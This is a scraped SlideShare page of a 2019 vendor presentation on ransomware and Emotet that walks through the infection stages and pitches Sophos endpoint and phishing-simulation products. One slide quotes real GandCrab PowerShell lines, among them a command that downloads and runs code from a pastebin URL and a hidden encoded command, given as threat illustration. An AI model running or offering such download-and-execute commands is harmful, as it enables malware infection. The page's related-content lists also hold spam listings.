SlideShare ist ein Scribd-Unternehmen logo
1 von 21
Lim Chee Keong
Senior Security Solution Engineer
May 2019
Ransomware and Modern Threats
What We’re Going to Cover
2
• Ransomware Playbook
o What it is, what it does
• Understanding EMOTET
• Sophos EDR – Threat Hunting
• Phish Threat
3
4
EMOTET
5
2014
Banking Trojan
“Amongst the most costly and destructive threats
to U.S. businesses right now”
U.S. Department for Homeland Security, 2018
2019
Crimeware-as-a-Service
Constant evolution
QakbotDridex IcedID
RyukSandbox Evasion
First
Seen
Upgraded Evasion ZBotTrickBot
Occasional Attacks
Emotet payloads change constantly
375 388
343
414
208
393
338
270
179
214
125
248
751
119 129
0
100
200
300
400
500
600
700
800
# of unique Emotet payload executables seen by SophosLabs
300
new payload executables every day
Emotet’s Goals
7
Spread across
network
Skim email
addresses and
names
Send spam to
infect other
organizations
Download any
malware
payload(s)
Be a
smokescreen
for targeted
ransomware
Steal browser
histories,
usernames
and passwords
Data breach
Security breach
Reputation damage
Primary infection
Secondary infection
High Impact
DEFENDING AGAINST
EMOTET WITH SOPHOS
8
An Emotet Attack
9
Your Network
C & C Servers Target1. Infiltrate
Cyber
Criminal
Spam email 2. Call Home
Register Success
Get Instructions
and Payload
B. Bot Attack
Send spam
to infect other orgs
A. Steal Data
Upload email addresses,
user names and
passwords
3. Spread
Spread to other systems
on the network
C. Payload
Install banking Trojan
Install ransomware
Stop Emotet From
Infecting your Endpoints
10
Anatomy of an
Emotet Attack
STAGE 1
User received a malicious email (malspam)
STAGE 2
User clicks on a malicious attachment
A document called ‘rgnr-avr111205-85.doc”
11
parent to
parent to
parentto
Outlook
75 registry
keys
1 IP
Address
386 files
rgnr-avr111205-85.doc
Word
cmd.exe
9 files
PowerShell
45 registry keys
Printer
Driver Host
431.exe
cmd.exe
431.exe
14 registry
keys
2 files
89 files
431.exe
STAGE 3
User enables malicious macros in the document
STAGE 4
The macro uses cmd.exe (Command Prompt) to
execute malicious, obfuscated code
STAGE 5
cmd.exe launches a second copy of cmd.exe
STAGE 6
This new instance of cmd.exe launches and
executes PowerShell
STAGE 7
PowerShell connects to an IP address and
downloads a file called 431.exe
STAGE 8
PowerShell executes 431.exe which, in turn,
executes a second copy of itself
STAGE 9
Intercept X detects PowerShell connecting to a
suspect IP address and downloading an exe with
unknown reputation, and blocks this behavior and
identifies the root cause (Outlook).
Delivery Exploitation Installation
Click
xyz.com SFX
***
Emotet Attack Chain
APPLICATION
CONTROL
MALICIOUS TRAFFIC
DETECTION
WEB PROTECTION
LOCAL PRIVILEGE
MITIGATION
DEEP
LEARNING
APPLICATION
LOCKDOWN
ANTI –EXPLOIT
(CODE/MEMORY/APC )
MITIGATIONS
HIPS
THREAT CASE (RCA) & EDR
RUNTIME HIPS
CREDENTIAL THEFT
PROTECTION
ANTI-RANSOMWARE
Command
& Control
Actions on
Objective
Ransomware - GrandCrab
"C:WindowsSysWOW64WindowsPower
Shellv1.0powershell.exe" IEX ((new-
object
net.webclient).downloadstring('https://past
ebin.com/raw/eCQtKD7T'));Invoke-
WNFVAVRLWSQHZC;Start-Sleep -s
1000000;
C:Windowssystem32WindowsPowerShellv1.0powershell.exe -nop -w hidden -e
SQBmACgAJABFAE4AVgA6AFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEM
ASABJAFQARQBDA………….
Security analysis: Cross-estate threat hunting
Security analysis: Automatically detect and prioritize
threats using machine learning
The Changing Focus of Cyber Attacks
Target systems,
applications and
networks with
malicious content
Target weakest link –
the employees – with
social engineering and
deception
Yesterday Today
Sophos Central Phish Threat
Educate and test your users to spot attacks
• Over 140 attack
templates using real
threat intelligence
TEST
1
• Deliver over 30
interactive security
training courses
TRAIN
2
• Campaign reporting
• Measure organization
and individuals
MEASURE
3
17
Attack
Email
Caught
Email
Training
Enrollment
Email
Attack
Landing
Page
Reminder
Email
Caught User
Landing
Page
Training
Landing
Page
PHISHING LINK CAMPAIGNS
Lure an employee to click on a link in an email
Phish Threat Campaigns
ATTACHMENT CAMPAIGNS
Simulate an attack involving a malicious Office attachment
TRAINING CAMPAIGNS
Enroll employees directly in training without simulation
CREDENTIAL HARVESTING CAMPAIGNS
Lure an employee into entering login credentials online
Customizable content and branding
19
Phish Threat Enhanced Reporting
20
Endpoint
Email
Web
XG Firewall
Dashboard
Reports
Campaigns
PHISH THREAT
21
www.netpluz.asia
contact@netpluz.asia
+65 6805 8998

Weitere ähnliche Inhalte

Was ist angesagt?

Needs of a Modern Incident Response Program
Needs of a Modern Incident Response ProgramNeeds of a Modern Incident Response Program
Needs of a Modern Incident Response Program
Lancope, Inc.
 

Was ist angesagt? (20)

Cyber Risk Management in the New Digitalisation Age - eSentinel™
Cyber Risk Management in the New Digitalisation Age - eSentinel™ Cyber Risk Management in the New Digitalisation Age - eSentinel™
Cyber Risk Management in the New Digitalisation Age - eSentinel™
 
Web App Attacks - Stats & Remediation
Web App Attacks - Stats & RemediationWeb App Attacks - Stats & Remediation
Web App Attacks - Stats & Remediation
 
Reducing Your Attack Surface and Yuor Role in Cloud Workload Protection
Reducing Your Attack Surface and Yuor Role in Cloud Workload ProtectionReducing Your Attack Surface and Yuor Role in Cloud Workload Protection
Reducing Your Attack Surface and Yuor Role in Cloud Workload Protection
 
FireEye Use Cases — FireEye Solution Deployment Experience
FireEye Use Cases — FireEye Solution Deployment ExperienceFireEye Use Cases — FireEye Solution Deployment Experience
FireEye Use Cases — FireEye Solution Deployment Experience
 
How to Recover from a Ransomware Disaster
How to Recover from a Ransomware DisasterHow to Recover from a Ransomware Disaster
How to Recover from a Ransomware Disaster
 
Addressing the cyber kill chain
Addressing the cyber kill chainAddressing the cyber kill chain
Addressing the cyber kill chain
 
Hands on Security, Disrupting the Kill Chain, SplunkLive! Austin
Hands on Security, Disrupting the Kill Chain, SplunkLive! AustinHands on Security, Disrupting the Kill Chain, SplunkLive! Austin
Hands on Security, Disrupting the Kill Chain, SplunkLive! Austin
 
Next Dimension and Veeam | Solutions for PIPEDA Compliance
Next Dimension and Veeam | Solutions for PIPEDA ComplianceNext Dimension and Veeam | Solutions for PIPEDA Compliance
Next Dimension and Veeam | Solutions for PIPEDA Compliance
 
WannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowWannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do Now
 
Netpluz | Protecting your Business with eSentinel | 360° Cyber Security Simpl...
Netpluz | Protecting your Business with eSentinel | 360° Cyber Security Simpl...Netpluz | Protecting your Business with eSentinel | 360° Cyber Security Simpl...
Netpluz | Protecting your Business with eSentinel | 360° Cyber Security Simpl...
 
The state of endpoint defense in 2021
The state of endpoint defense in 2021The state of endpoint defense in 2021
The state of endpoint defense in 2021
 
Oliver Schuermann - Integrated Software in Networking - the Mystery of SDN
Oliver Schuermann - Integrated Software in Networking - the Mystery of SDNOliver Schuermann - Integrated Software in Networking - the Mystery of SDN
Oliver Schuermann - Integrated Software in Networking - the Mystery of SDN
 
Wannacry & Petya ransomware
Wannacry & Petya ransomwareWannacry & Petya ransomware
Wannacry & Petya ransomware
 
The Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup StoryThe Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup Story
 
CSS Trivia
CSS TriviaCSS Trivia
CSS Trivia
 
LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR Overview
 
Needs of a Modern Incident Response Program
Needs of a Modern Incident Response ProgramNeeds of a Modern Incident Response Program
Needs of a Modern Incident Response Program
 
Kaspersky Lab’s Webinar ‘Emerging Threats in the APT World: Predictions for 2...
Kaspersky Lab’s Webinar ‘Emerging Threats in the APT World: Predictions for 2...Kaspersky Lab’s Webinar ‘Emerging Threats in the APT World: Predictions for 2...
Kaspersky Lab’s Webinar ‘Emerging Threats in the APT World: Predictions for 2...
 
OFFICE 365 SECURITY
OFFICE 365 SECURITYOFFICE 365 SECURITY
OFFICE 365 SECURITY
 
Industry reactions to wanna cry ransomware attacks
Industry reactions to wanna cry ransomware attacksIndustry reactions to wanna cry ransomware attacks
Industry reactions to wanna cry ransomware attacks
 

Ähnlich wie Netpluz - Managed Firewall & Endpoint Protection

TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
Aditya K Sood
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
Harish Chaudhary
 

Ähnlich wie Netpluz - Managed Firewall & Endpoint Protection (20)

Cyper security & Ethical hacking
Cyper security & Ethical hackingCyper security & Ethical hacking
Cyper security & Ethical hacking
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
Computer Worms
Computer WormsComputer Worms
Computer Worms
 
RRB JE Stage 2 Computer and Applications Questions Part 5
RRB JE Stage 2 Computer and Applications Questions Part 5RRB JE Stage 2 Computer and Applications Questions Part 5
RRB JE Stage 2 Computer and Applications Questions Part 5
 
Event - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security PerimetersEvent - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security Perimeters
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
The Role of Application Control in a Zero-Day Reality
The Role of Application Control in a Zero-Day RealityThe Role of Application Control in a Zero-Day Reality
The Role of Application Control in a Zero-Day Reality
 
Lecture about network and host security to NII students
Lecture about network and host security to NII studentsLecture about network and host security to NII students
Lecture about network and host security to NII students
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry more
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
 
Malware
MalwareMalware
Malware
 
Malware
MalwareMalware
Malware
 
Computer crimes
Computer crimesComputer crimes
Computer crimes
 
The Dynamite of Next Generation (Y) Attack
The Dynamite of Next Generation (Y) AttackThe Dynamite of Next Generation (Y) Attack
The Dynamite of Next Generation (Y) Attack
 
Ransomware by lokesh
Ransomware by lokeshRansomware by lokesh
Ransomware by lokesh
 
DEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptDEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.ppt
 
Secure by design and secure software development
Secure by design and secure software developmentSecure by design and secure software development
Secure by design and secure software development
 
Mobile threat-report-mid-year-2018 en-us-1.0
Mobile threat-report-mid-year-2018 en-us-1.0Mobile threat-report-mid-year-2018 en-us-1.0
Mobile threat-report-mid-year-2018 en-us-1.0
 

Mehr von Netpluz Asia Pte Ltd

Mehr von Netpluz Asia Pte Ltd (20)

Cyber Risk Management in the New Digitalisation Age - Mitigating Risk with Cy...
Cyber Risk Management in the New Digitalisation Age - Mitigating Risk with Cy...Cyber Risk Management in the New Digitalisation Age - Mitigating Risk with Cy...
Cyber Risk Management in the New Digitalisation Age - Mitigating Risk with Cy...
 
Netpluz corp presentation 2020
Netpluz corp presentation 2020Netpluz corp presentation 2020
Netpluz corp presentation 2020
 
Secure & Protect your Data with Druva
Secure & Protect your Data with Druva Secure & Protect your Data with Druva
Secure & Protect your Data with Druva
 
The State of Ransomware 2020
The State of Ransomware 2020The State of Ransomware 2020
The State of Ransomware 2020
 
Simplifying Communication with Microsoft Teams & Netpluz SIP Trunk
Simplifying Communication with Microsoft Teams & Netpluz SIP TrunkSimplifying Communication with Microsoft Teams & Netpluz SIP Trunk
Simplifying Communication with Microsoft Teams & Netpluz SIP Trunk
 
SAY HELLO TO MICROSOFT TEAMS
SAY HELLO TO MICROSOFT TEAMSSAY HELLO TO MICROSOFT TEAMS
SAY HELLO TO MICROSOFT TEAMS
 
eSentinel webinar with Netpluz & Straits Interactive on Cyber Security & PDPA...
eSentinel webinar with Netpluz & Straits Interactive on Cyber Security & PDPA...eSentinel webinar with Netpluz & Straits Interactive on Cyber Security & PDPA...
eSentinel webinar with Netpluz & Straits Interactive on Cyber Security & PDPA...
 
eSentinel™ – 360° Cybersecurity Platform Simplified
eSentinel™ – 360° Cybersecurity Platform SimplifiedeSentinel™ – 360° Cybersecurity Platform Simplified
eSentinel™ – 360° Cybersecurity Platform Simplified
 
Using a secured, cloud-delivered SD-WAN to transform your business network
Using a secured, cloud-delivered SD-WAN to transform your business networkUsing a secured, cloud-delivered SD-WAN to transform your business network
Using a secured, cloud-delivered SD-WAN to transform your business network
 
Netpluz DDoS Mitigation - Managed Cyber Security
Netpluz DDoS Mitigation - Managed Cyber Security Netpluz DDoS Mitigation - Managed Cyber Security
Netpluz DDoS Mitigation - Managed Cyber Security
 
Netpluz Managed Cyber Security
Netpluz Managed Cyber Security Netpluz Managed Cyber Security
Netpluz Managed Cyber Security
 
Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service Netpluz Managed SOC - MSS Service
Netpluz Managed SOC - MSS Service
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing
 
SME Cyber Insurance
SME Cyber Insurance SME Cyber Insurance
SME Cyber Insurance
 
Netpluz Managed Services Portfolio
Netpluz Managed Services PortfolioNetpluz Managed Services Portfolio
Netpluz Managed Services Portfolio
 
Y5Zone Singapore - Wifi Advertisement & EDM services
Y5Zone Singapore - Wifi Advertisement & EDM services Y5Zone Singapore - Wifi Advertisement & EDM services
Y5Zone Singapore - Wifi Advertisement & EDM services
 
Getting ready for wi-fi 6 and IOT
Getting ready for wi-fi 6 and IOTGetting ready for wi-fi 6 and IOT
Getting ready for wi-fi 6 and IOT
 
Managed Security Operations Centre Alternative - Managed Security Service
Managed Security Operations Centre Alternative - Managed Security Service Managed Security Operations Centre Alternative - Managed Security Service
Managed Security Operations Centre Alternative - Managed Security Service
 
Email Phishing Test Simulation, Educating the Users
Email Phishing Test Simulation, Educating the UsersEmail Phishing Test Simulation, Educating the Users
Email Phishing Test Simulation, Educating the Users
 
The Best Just Got Better, Intercept X Now With EDR
The Best Just Got Better, Intercept X Now With EDRThe Best Just Got Better, Intercept X Now With EDR
The Best Just Got Better, Intercept X Now With EDR
 

KĂźrzlich hochgeladen

Call Girls Jp Nagar Just Call 👗 7737669865 👗 Top Class Call Girl Service Bang...
Call Girls Jp Nagar Just Call 👗 7737669865 👗 Top Class Call Girl Service Bang...Call Girls Jp Nagar Just Call 👗 7737669865 👗 Top Class Call Girl Service Bang...
Call Girls Jp Nagar Just Call 👗 7737669865 👗 Top Class Call Girl Service Bang...
amitlee9823
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
dollysharma2066
 
Call Girls From Pari Chowk Greater Noida ❤️8448577510 ⊹Best Escorts Service I...
Call Girls From Pari Chowk Greater Noida ❤️8448577510 ⊹Best Escorts Service I...Call Girls From Pari Chowk Greater Noida ❤️8448577510 ⊹Best Escorts Service I...
Call Girls From Pari Chowk Greater Noida ❤️8448577510 ⊹Best Escorts Service I...
lizamodels9
 
Call Girls Electronic City Just Call 👗 7737669865 👗 Top Class Call Girl Servi...
Call Girls Electronic City Just Call 👗 7737669865 👗 Top Class Call Girl Servi...Call Girls Electronic City Just Call 👗 7737669865 👗 Top Class Call Girl Servi...
Call Girls Electronic City Just Call 👗 7737669865 👗 Top Class Call Girl Servi...
amitlee9823
 
Call Now ☎️🔝 9332606886🔝 Call Girls ❤ Service In Bhilwara Female Escorts Serv...
Call Now ☎️🔝 9332606886🔝 Call Girls ❤ Service In Bhilwara Female Escorts Serv...Call Now ☎️🔝 9332606886🔝 Call Girls ❤ Service In Bhilwara Female Escorts Serv...
Call Now ☎️🔝 9332606886🔝 Call Girls ❤ Service In Bhilwara Female Escorts Serv...
Anamikakaur10
 
Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...
Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...
Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...
daisycvs
 
Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...
Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...
Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...
lizamodels9
 
The Abortion pills for sale in Qatar@Doha [+27737758557] []Deira Dubai Kuwait
The Abortion pills for sale in Qatar@Doha [+27737758557] []Deira Dubai KuwaitThe Abortion pills for sale in Qatar@Doha [+27737758557] []Deira Dubai Kuwait
The Abortion pills for sale in Qatar@Doha [+27737758557] []Deira Dubai Kuwait
daisycvs
 

KĂźrzlich hochgeladen (20)

Dr. Admir Softic_ presentation_Green Club_ENG.pdf
Dr. Admir Softic_ presentation_Green Club_ENG.pdfDr. Admir Softic_ presentation_Green Club_ENG.pdf
Dr. Admir Softic_ presentation_Green Club_ENG.pdf
 
Falcon Invoice Discounting platform in india
Falcon Invoice Discounting platform in indiaFalcon Invoice Discounting platform in india
Falcon Invoice Discounting platform in india
 
PHX May 2024 Corporate Presentation Final
PHX May 2024 Corporate Presentation FinalPHX May 2024 Corporate Presentation Final
PHX May 2024 Corporate Presentation Final
 
Call Girls Jp Nagar Just Call 👗 7737669865 👗 Top Class Call Girl Service Bang...
Call Girls Jp Nagar Just Call 👗 7737669865 👗 Top Class Call Girl Service Bang...Call Girls Jp Nagar Just Call 👗 7737669865 👗 Top Class Call Girl Service Bang...
Call Girls Jp Nagar Just Call 👗 7737669865 👗 Top Class Call Girl Service Bang...
 
Value Proposition canvas- Customer needs and pains
Value Proposition canvas- Customer needs and painsValue Proposition canvas- Customer needs and pains
Value Proposition canvas- Customer needs and pains
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
 
Phases of Negotiation .pptx
 Phases of Negotiation .pptx Phases of Negotiation .pptx
Phases of Negotiation .pptx
 
Call Girls From Pari Chowk Greater Noida ❤️8448577510 ⊹Best Escorts Service I...
Call Girls From Pari Chowk Greater Noida ❤️8448577510 ⊹Best Escorts Service I...Call Girls From Pari Chowk Greater Noida ❤️8448577510 ⊹Best Escorts Service I...
Call Girls From Pari Chowk Greater Noida ❤️8448577510 ⊹Best Escorts Service I...
 
Call Girls Electronic City Just Call 👗 7737669865 👗 Top Class Call Girl Servi...
Call Girls Electronic City Just Call 👗 7737669865 👗 Top Class Call Girl Servi...Call Girls Electronic City Just Call 👗 7737669865 👗 Top Class Call Girl Servi...
Call Girls Electronic City Just Call 👗 7737669865 👗 Top Class Call Girl Servi...
 
How to Get Started in Social Media for Art League City
How to Get Started in Social Media for Art League CityHow to Get Started in Social Media for Art League City
How to Get Started in Social Media for Art League City
 
It will be International Nurses' Day on 12 May
It will be International Nurses' Day on 12 MayIt will be International Nurses' Day on 12 May
It will be International Nurses' Day on 12 May
 
Call Now ☎️🔝 9332606886🔝 Call Girls ❤ Service In Bhilwara Female Escorts Serv...
Call Now ☎️🔝 9332606886🔝 Call Girls ❤ Service In Bhilwara Female Escorts Serv...Call Now ☎️🔝 9332606886🔝 Call Girls ❤ Service In Bhilwara Female Escorts Serv...
Call Now ☎️🔝 9332606886🔝 Call Girls ❤ Service In Bhilwara Female Escorts Serv...
 
Falcon's Invoice Discounting: Your Path to Prosperity
Falcon's Invoice Discounting: Your Path to ProsperityFalcon's Invoice Discounting: Your Path to Prosperity
Falcon's Invoice Discounting: Your Path to Prosperity
 
Marel Q1 2024 Investor Presentation from May 8, 2024
Marel Q1 2024 Investor Presentation from May 8, 2024Marel Q1 2024 Investor Presentation from May 8, 2024
Marel Q1 2024 Investor Presentation from May 8, 2024
 
Falcon Invoice Discounting: Empowering Your Business Growth
Falcon Invoice Discounting: Empowering Your Business GrowthFalcon Invoice Discounting: Empowering Your Business Growth
Falcon Invoice Discounting: Empowering Your Business Growth
 
Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...
Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...
Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...
 
Katrina Personal Brand Project and portfolio 1
Katrina Personal Brand Project and portfolio 1Katrina Personal Brand Project and portfolio 1
Katrina Personal Brand Project and portfolio 1
 
Cracking the Cultural Competence Code.pptx
Cracking the Cultural Competence Code.pptxCracking the Cultural Competence Code.pptx
Cracking the Cultural Competence Code.pptx
 
Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...
Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...
Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...
 
The Abortion pills for sale in Qatar@Doha [+27737758557] []Deira Dubai Kuwait
The Abortion pills for sale in Qatar@Doha [+27737758557] []Deira Dubai KuwaitThe Abortion pills for sale in Qatar@Doha [+27737758557] []Deira Dubai Kuwait
The Abortion pills for sale in Qatar@Doha [+27737758557] []Deira Dubai Kuwait
 

Netpluz - Managed Firewall & Endpoint Protection

  • 1. Lim Chee Keong Senior Security Solution Engineer May 2019 Ransomware and Modern Threats
  • 2. What We’re Going to Cover 2 • Ransomware Playbook o What it is, what it does • Understanding EMOTET • Sophos EDR – Threat Hunting • Phish Threat
  • 3. 3
  • 4. 4
  • 5. EMOTET 5 2014 Banking Trojan “Amongst the most costly and destructive threats to U.S. businesses right now” U.S. Department for Homeland Security, 2018 2019 Crimeware-as-a-Service Constant evolution QakbotDridex IcedID RyukSandbox Evasion First Seen Upgraded Evasion ZBotTrickBot Occasional Attacks
  • 6. Emotet payloads change constantly 375 388 343 414 208 393 338 270 179 214 125 248 751 119 129 0 100 200 300 400 500 600 700 800 # of unique Emotet payload executables seen by SophosLabs 300 new payload executables every day
  • 7. Emotet’s Goals 7 Spread across network Skim email addresses and names Send spam to infect other organizations Download any malware payload(s) Be a smokescreen for targeted ransomware Steal browser histories, usernames and passwords Data breach Security breach Reputation damage Primary infection Secondary infection High Impact
  • 9. An Emotet Attack 9 Your Network C & C Servers Target1. Infiltrate Cyber Criminal Spam email 2. Call Home Register Success Get Instructions and Payload B. Bot Attack Send spam to infect other orgs A. Steal Data Upload email addresses, user names and passwords 3. Spread Spread to other systems on the network C. Payload Install banking Trojan Install ransomware
  • 10. Stop Emotet From Infecting your Endpoints 10
  • 11. Anatomy of an Emotet Attack STAGE 1 User received a malicious email (malspam) STAGE 2 User clicks on a malicious attachment A document called ‘rgnr-avr111205-85.doc” 11 parent to parent to parentto Outlook 75 registry keys 1 IP Address 386 files rgnr-avr111205-85.doc Word cmd.exe 9 files PowerShell 45 registry keys Printer Driver Host 431.exe cmd.exe 431.exe 14 registry keys 2 files 89 files 431.exe STAGE 3 User enables malicious macros in the document STAGE 4 The macro uses cmd.exe (Command Prompt) to execute malicious, obfuscated code STAGE 5 cmd.exe launches a second copy of cmd.exe STAGE 6 This new instance of cmd.exe launches and executes PowerShell STAGE 7 PowerShell connects to an IP address and downloads a file called 431.exe STAGE 8 PowerShell executes 431.exe which, in turn, executes a second copy of itself STAGE 9 Intercept X detects PowerShell connecting to a suspect IP address and downloading an exe with unknown reputation, and blocks this behavior and identifies the root cause (Outlook).
  • 12. Delivery Exploitation Installation Click xyz.com SFX *** Emotet Attack Chain APPLICATION CONTROL MALICIOUS TRAFFIC DETECTION WEB PROTECTION LOCAL PRIVILEGE MITIGATION DEEP LEARNING APPLICATION LOCKDOWN ANTI –EXPLOIT (CODE/MEMORY/APC ) MITIGATIONS HIPS THREAT CASE (RCA) & EDR RUNTIME HIPS CREDENTIAL THEFT PROTECTION ANTI-RANSOMWARE Command & Control Actions on Objective
  • 13. Ransomware - GrandCrab "C:WindowsSysWOW64WindowsPower Shellv1.0powershell.exe" IEX ((new- object net.webclient).downloadstring('https://past ebin.com/raw/eCQtKD7T'));Invoke- WNFVAVRLWSQHZC;Start-Sleep -s 1000000; C:Windowssystem32WindowsPowerShellv1.0powershell.exe -nop -w hidden -e SQBmACgAJABFAE4AVgA6AFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEM ASABJAFQARQBDA………….
  • 15. Security analysis: Automatically detect and prioritize threats using machine learning
  • 16. The Changing Focus of Cyber Attacks Target systems, applications and networks with malicious content Target weakest link – the employees – with social engineering and deception Yesterday Today
  • 17. Sophos Central Phish Threat Educate and test your users to spot attacks • Over 140 attack templates using real threat intelligence TEST 1 • Deliver over 30 interactive security training courses TRAIN 2 • Campaign reporting • Measure organization and individuals MEASURE 3 17
  • 18. Attack Email Caught Email Training Enrollment Email Attack Landing Page Reminder Email Caught User Landing Page Training Landing Page PHISHING LINK CAMPAIGNS Lure an employee to click on a link in an email Phish Threat Campaigns ATTACHMENT CAMPAIGNS Simulate an attack involving a malicious Office attachment TRAINING CAMPAIGNS Enroll employees directly in training without simulation CREDENTIAL HARVESTING CAMPAIGNS Lure an employee into entering login credentials online Customizable content and branding
  • 19. 19
  • 20. Phish Threat Enhanced Reporting 20 Endpoint Email Web XG Firewall Dashboard Reports Campaigns PHISH THREAT

Hinweis der Redaktion

  1. Diving into the agenda for today: - We’re going to start by looking at what Emotet is, how it works – we’ve got the latest updates from Sophos Support and SophosLabs to share with you. -We’ll then look at how Sophos solutions help protect you against Emotet – we’re going to look holistically, at both the endpoint and the network level - We’ll explore what to do if you have the misfortune to be hit by Emotet - And finally we’ll close out with the three best practice steps we recommend every organization follows to maximize their Emotet protection
  2. Emotet is a really sophisticated, really nasty worm. Indeed, the US Department of Homeland Security considers it amongst the most costly and destructive threats to US businesses right now. Not that it limits itself to the US – more of that in a moment Emotet is not a new piece of malware, but it’s one that’s got steadily more complex and more destructive. We started seeing Emotet five years ago. It started off as a Trojan that silently stole banking credentials. Since then it has evolved into a highly sophisticated platform for distributing other kinds of malware. It’s crimeware as a service Emotet serves up whatever malware pays. So far this year that’s meant TrickBot and QBot banking Trojans, although it’s also been linked with BitPaymer – a strain of sophisticated ransomware that extorts six-figure payouts. The people behind Emotet are highly professional, financially motivated and they’re constantly evolving their threat to make it more powerful and destructive.
  3. And when I say ‘constantly evolving’ I really mean it! One of the characteristics of Emotet is that its payloads change all the time. This graph here shows the number of new unique Emotet payload executables seen by SophosLabs in the last two weeks of January this year. As you can see, there are literally hundreds of versions every single day. In fact, on average, SophosLabs sees around 300 new unique payload executables every day, and saw almost four and a half thousand (4,494) unique payload executables in the last 15 days of January alone.
  4. So that’s what Emotet is. Let’s take a look now at what Emotet does. Unfortunately the answer is ‘lots of things’ Once inside your computer, Emotet tries to: 1. Spread onto as many machines as possible. It’s a worm so can spread without user interaction. It moves from one infected computer to another via the network. 2. Send malicious emails to infect other organizations 3. Download a malware payload. Traditionally the payloads have mostly been banking Trojans, with Trickbot the most prevalent. Its payload injects code into your browser to automatically debit your bank and PayPal accounts when you next login. 4. Some Emotet variants skim email addresses and names from email client data and archives, likely so they can be sold as part of a wider list and used to spread more malicious spam. 5. Others inspect your web browser, stealing histories and saved usernames and passwords. 6. To compound the pain, Emotet can also be a smokescreen for targeted ransomware attacks. While organizations are dealing with Emotet infections, ransomware like BitPaymer takes advantage of the distraction to hold the organization’s data hostage. Emotet’s activities are hugely damaging for impacted organizations: - reputation damage from sending spam - a primary infection – often a banking Trojan that leads to $$$ loss - a data breach from email data loss – bringing in compliance / GDPR concerns - a security breach from the loss of user names and passwords And potentially a secondary infection – usually a ransomware attack, that tries to extort more $$$
  5. So that’s how Emotet works, now lets look at how you can defend against it with Sophos.
  6. To understand how Sophos protects against Emotet we need to dive into the attack in some detail. As we’ve seen, Emotet typically starts with a spam email with malicious attachment. Once into the network it will call home to let the hacker know it’s successful, and get updates, instructions and payloads It then spreads, and being a worm it can do this without user activity, although it does take advantage of unpatched vulnerabilities such as the EternalBlue exploit. Next, as we’ve seen, it can carry out a range of unpleasant activities: Steal email addresses Steal browser histories, user names and passwords Send spam to infect other organizations Install banking Trojans Deliver ransomware Sophos protects against Emotet in multiple ways Block the attack from entering the network in the first place Stop Emotet from spreading to other parts of the network Prevent Emotet from calling home Stop Emotet from infecting your endpoints and installing banking Trojans or ransomware Block it from stealing sensitive data Stop Emotet from sending spam to 